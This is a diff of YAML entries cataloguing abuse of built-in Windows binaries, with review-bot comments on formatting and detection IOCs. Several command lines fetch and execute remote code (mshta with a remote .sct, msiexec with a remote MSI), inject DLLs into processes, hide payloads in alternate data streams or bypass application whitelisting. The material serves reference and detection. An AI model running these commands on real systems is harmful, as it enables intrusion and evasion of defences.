@@ -1,22 +1,44 @@ --- Name: Makecab.exe -Description: Package, Add ADS, Download -Author: '' +Description: Binary to package existing files into a cabinet (.cab) file +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Description: Compresses the target file and stores it in the target file. + Usecase: Hide data compressed into an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + Description: Download and compresses the target file and stores it in the target file. 
+ Usecase: Download file and compress into a cab file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\makecab.exe - - c:\windows\sysWOW64\makecab.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\makecab.exe + - Path: C:\Windows\SysWOW64\makecab.exe +Code Sample: +- Code: +Detection: + - IOC: Makecab getting files from Internet + - IOC: Makecab storing data into alternate data streams Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index deb4bb3..012df46 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml 
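Review bot: The third command's Description, `Download and compresses the target file and stores it in the target file`, mixes verb forms and uses `target file` for both source and destination; `Downloads the source file from the UNC path and compresses it into the destination CAB file.` keeps the meaning. The first two commands carry an identical `Usecase` although one reads a local file and the other `\\webdavserver\webdav\file.exe`; the Findstr entry in this commit differentiates the UNC case with `... from a webdav server ...`, and the same wording here would keep these two from looking like duplicates.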
@@ -1,22 +1,39 @@ --- Name: Mavinject.exe -Description: Execute, Read ADS -Author: '' +Description: Used by App-v in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll Description: Inject evil.dll into a process with PID 3110. + Usecase: Inject dll file into running process + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. + Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 + Usecase: Inject dll file into running process + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\mavinject.exe - - C:\Windows\SysWOW64\mavinject.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\mavinject.exe + - Path: C:\Windows\SysWOW64\mavinject.exe +Code Sample: +- Code: +Detection: + - IOC: mavinject.exe should not run unless APP-v is in use on the workstation Resources: - - https://twitter.com/gN3mes1s/status/941315826107510784 - - https://twitter.com/Hexcorn/status/776122138063409152 - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/gN3mes1s/status/941315826107510784 + - Link: https://twitter.com/Hexcorn/status/776122138063409152 + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: 
Giuseppe N3mes1s + Handle: '@gN3mes1s' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 336c5fc..8b5bb46 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
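Review bot: The removed `Notes` line credited three people (`Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe`), but the new `Acknowledgement:` list has only two, even though the Hexcorn tweet is still listed under Resources; add `- Person: Adam` with `Handle: '@hexacorn'` unless the omission is intentional. Minor: `App-v` in the Description and `APP-v` in the IOC should agree (the product is written `App-V`), and the second command's Description lost its trailing period.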
@@ -1,27 +1,44 @@ --- -Name: Msbuild.exe -Description: Execute -Author: '' +Name: Msbuild.exe +Description: Used to compile and execute code +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. - - Command: msbuild.exe Msbuild.csproj - Description: Build and execute a C# project stored in the target CSPROJ file. + Usecase: Compile and run code + Category: AWL bypass + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.csproj + Description: Build and execute a C# project stored in the target csproj file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe +Code Sample: +- Code: +Detection: + - IOC: Msbuild.exe should not normally be executed on workstations Resources: - - 
https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md - - https://github.com/Cn33liz/MSBuildShell - - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis - + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md + - Link: https://github.com/Cn33liz/MSBuildShell + - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Cn33liz + Handle: '@Cneelis' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 823b57a..8e6e402 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml 
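Review bot: The IOC `Msbuild.exe should not normally be executed on workstations` will be noisy on developer machines, where MSBuild runs for every Visual Studio build; qualifying it, e.g. `- IOC: Msbuild.exe executed on a workstation without development tooling installed`, makes it actionable. The top-level `Description: Used to compile and execute code` describes the abuse rather than the binary, while the other new Descriptions in this commit (Installutil, Msconfig, Msdt) describe the legitimate purpose; `Description: Build engine for .NET projects, also able to compile and execute code from a project file` would match that convention.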
@@ -1,19 +1,27 @@ --- Name: Msconfig.exe -Description: Execute -Author: '' +Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Msconfig.exe -5 Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. + Usecase: Code execution using Msconfig.exe + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\msconfig.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\msconfig.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml +Detection: + - IOC: mscfgtlc.xml changes in system32 folder + - IOC: msconfig.exe executing Resources: - - https://twitter.com/pabraeken/status/991314564896690177 -Notes: | - Thanks to Pierre-Alexandre Braeken - @pabraeken - See the Payloads folder for an example mscfgtlc.xml file. - + - Link: https://twitter.com/pabraeken/status/991314564896690177 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1ecd5bf..f83d507 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml 
@@ -1,25 +1,37 @@ --- Name: Msdt.exe -Description: Execute -Author: '' +Description: Microsoft diagnostics tool +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Open .diagcab package - Description: '' - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml - /skip TRUE + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + Usecase: Execute code bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\System32\Msdt.exe ' - - 'C:\Windows\SysWOW64\Msdt.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Msdt.exe + - Path: C:\Windows\SysWOW64\Msdt.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml +Detection: + - IOC: Resources: - - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - https://twitter.com/harr0ey/status/991338229952598016 -Notes: | - Thanks to: - See the Payloads folder for an example PCW8E57.xml file. 
- + - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - Link: https://twitter.com/harr0ey/status/991338229952598016 +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index c4c4f6a..9cb16a9 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml 
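Review bot: The new `Acknowledgement` block ends with `- Person:` and `Handle:` carrying no value, and `Detection` has a bare `- IOC:`; YAML parses all three as null, so whatever renders the template will emit empty fields (the old `Notes: Thanks to:` was equally empty, but the structured form makes the gap visible). Either drop the empty `Acknowledgement` item or fill it, and replace the null IOC with something the hunk itself supports, e.g. `- IOC: msdt.exe launched with -af pointing at a .xml outside C:\Windows\diagnostics`, which follows from the example passing `-af C:\PCW8E57.xml` alongside the stock `-path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml`. The two entries are byte-identical except for `Usecase`/`Category`; if that duplication is intentional for the one-category-per-entry template, a short note in the description would save the next editor from deduplicating it.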
@@ -1,28 +1,57 @@ --- -Name: mshta.exe -Description: Execute, Read ADS -Author: '' +Name: Mshta.exe +Description: Used by Windows to execute html applications. (.hta) +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: mshta.exe evilfile.hta Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) Description: Executes VBScript supplied as a command line argument. - - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. 
+ Usecase: Execute code hidden in alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\mshta.exe - - C:\Windows\SysWOW64\mshta.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\mshta.exe + - Path: C:\Windows\SysWOW64\mshta.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct +Detection: + - IOC: mshta.exe executing raw or obfuscated script within the command-line + - IOC: Usage of HTA file Resources: - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe - + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index d1dbd56..b68a194 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml 
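Review bot: The fourth entry (`mshta.exe "C:\ads\file.txt:file.hta"`) is tagged `Category: Alternate data streams` but keeps `MitreID: T1170`, whereas the other ADS-category entries in this commit (Print, Reg, Regedit) map to `T1096`; pick one convention for whether `MitreID` follows the binary or the category and apply it here. The `Description` for that entry is a copy of the first one and does not mention the stream, so consider `Description: Opens the target .HTA stored in an alternate data stream and executes embedded JavaScript, JScript, or VBScript.`. The two IOCs are reasonable, and the `javascript:`/`vbscript:` protocol prefixes visible in the second and third commands would make a third, more specific one.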
@@ -1,25 +1,54 @@ --- Name: Msiexec.exe -Description: Execute -Author: '' +Description: Used by Windows to execute msi files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: msiexec /quiet /i cmd.msi Description: Installs the target .MSI file silently. + Usecase: Execute custom made msi file with attack code + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. + Usecase: Execute custom made msi file with attack code from remote server + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DLLRegisterServer to register the target DLL. + Usecase: Execute dll files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLRegisterServer to un-register the target DLL. 
+ Usecase: Execute dll files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\msiexec.exe - - c:\windows\sysWOW64\msiexec.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\msiexec.exe + - Path: C:\Windows\SysWOW64\msiexec.exe +Code Sample: +- Code: +Detection: + - IOC: msiexec.exe getting files from Internet Resources: - - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - - https://twitter.com/PhilipTsukerman/status/992021361106268161 -Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman - + - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ + - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 +Acknowledgement: + - Person: netbiosX + Handle: '@netbiosX' + - Person: Philip Tsukerman + Handle: @PhilipTsukerman +--- \ No newline at end of file diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 93a9ee6..9cd761e 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml 
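Review bot: `Handle: @PhilipTsukerman` is not valid YAML — `@` is a reserved indicator and cannot begin a plain scalar, so this file will fail to parse while every other handle in the commit is quoted. Change it to `Handle: '@PhilipTsukerman'`. The `Code Sample` list holds a bare `- Code:`, which parses as null; if there is no sample, an empty list (`Code Sample: []`, as the old file had) is cleaner than a null item.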
@@ -1,22 +1,28 @@ --- -Name: odbcconf.exe -Description: Execute -Author: '' +Name: Odbcconf.exe +Description: Used in Windows for managing ODBC connections +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. + Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Usecase: Execute dll file using technique that can evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\odbcconf.exe ' - - c:\windows\sysWOW64\odbcconf.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\odbcconf.exe + - Path: C:\Windows\SysWOW64\odbcconf.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp +Detection: + - IOC: Resources: - - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b - - https://github.com/woanware/application-restriction-bypasses - - https://twitter.com/subTee/status/789459826367606784 -Notes: | - Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer - See the Playloads folder for an example .RSP file. - + - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b + - Link: https://github.com/woanware/application-restriction-bypasses +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 147f003..af4e1e8 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml 
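Review bot: The new `Description` line carries the typo `See the Playloads folder for an example .RSP file.`, which the old `Notes` block also had; it is being rewritten here, so fix it to `Payloads` in this hunk. The old `Notes` credited Nick Tyrer and his gist is still the first `Resources` link, but the new `Acknowledgement` only lists Casey Smith — add `- Person: Nick Tyrer` / `Handle: '@NickTyrer'`. The bare `- IOC:` parses as null; `- IOC: odbcconf.exe executed with -f and a .rsp file argument` is directly supported by the command shown.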
@@ -1,24 +1,44 @@ --- Name: Pcalua.exe -Description: Execute -Author: '' +Description: Program Compatibility Assistant +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: pcalua.exe -a calc.exe Description: Open the target .EXE using the Program Compatibility Assistant. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. + Usecase: Proxy execution of remote dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. + Usecase: Execution of CPL files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\pcalua.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\pcalua.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/KyleHanslovan/status/912659279806640128 -Notes: | - Thanks to: - fab - @0rbz_ - Kyle Hanslovan - @KyleHanslovan - + - Link: https://twitter.com/KyleHanslovan/status/912659279806640128 +Acknowledgement: + - Person: Kyle Hanslovan + Handle: '@kylehanslovan' + - Person: Fab + Handle: @0rbz_ +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index 2afd5db..65ebb0e 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml 
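Review bot: `Handle: @0rbz_` is a YAML parse error — a plain scalar may not start with `@` — and will break loading of this file; quote it as `Handle: '@0rbz_'` like the `'@kylehanslovan'` entry above it. The `Detection` list is a single null `- IOC:`; the three commands all share the `-a` switch followed by a path, so `- IOC: pcalua.exe executed with -a pointing at a non-system path or a UNC share` is grounded in the hunk. `Code Sample: - Code:` is likewise a null item where an empty list would be clearer.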
@@ -1,17 +1,26 @@ --- Name: Pcwrun.exe -Description: Execute -Author: '' +Description: Program Compatibility Wizard +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Pcwrun.exe c:\temp\beacon.exe Description: Open the target .EXE file with the Program Compatibility Wizard. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\pcwrun.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\pcwrun.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/991335019833708544 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken - + - Link: https://twitter.com/pabraeken/status/991335019833708544 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 4461ccc..d7f528d 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml 
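Review bot: `Detection` is left as a bare `- IOC:` (null), which the template will render as an empty bullet. The only command, `Pcwrun.exe c:\temp\beacon.exe`, supports at least `- IOC: pcwrun.exe launched with a path to an executable outside Program Files or System32`; presumably the wizard runs the target as a child process, in which case pcwrun.exe as parent of an unexpected executable is the better event to key on, but confirm before writing it as fact.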
@@ -1,19 +1,28 @@ --- -Name: PresentationHost.exe -Description: Execute -Author: '' +Name: Presentationhost.exe +Description: File is used for executing Browser applications +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap - Description: Executes the target XAML Browser Application (XBAP) file. + Description: Executes the target XAML Browser Application (XBAP) file + Usecase: Execute code within xbap files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\PresentationHost.exe ' - - 'c:\windows\sysWOW64\PresentationHost.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Presentationhost.exe + - Path: C:\Windows\SysWOW64\Presentationhost.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index 2dca5c2..84be934 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml 
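Review bot: The new `Description: File is used for executing Browser applications` is vaguer than the command's own description, which names the file type; `Description: Used by Windows to execute XAML Browser Applications (.xbap)` says the same thing precisely. `Detection` holds only a null `- IOC:`; `- IOC: presentationhost.exe launched with a .xbap path argument` follows from the single command shown. Note the `Full Path` casing was changed from `PresentationHost.exe` to `Presentationhost.exe`, which is harmless on Windows but worth keeping consistent with the `Name` field across the corpus.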
@@ -1,23 +1,45 @@ --- Name: Print.exe -Description: Download, Copy, Add ADS -Author: '' +Description: Used by Windows to send files to the printer +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. + Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe + Usecase: Copy files + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. 
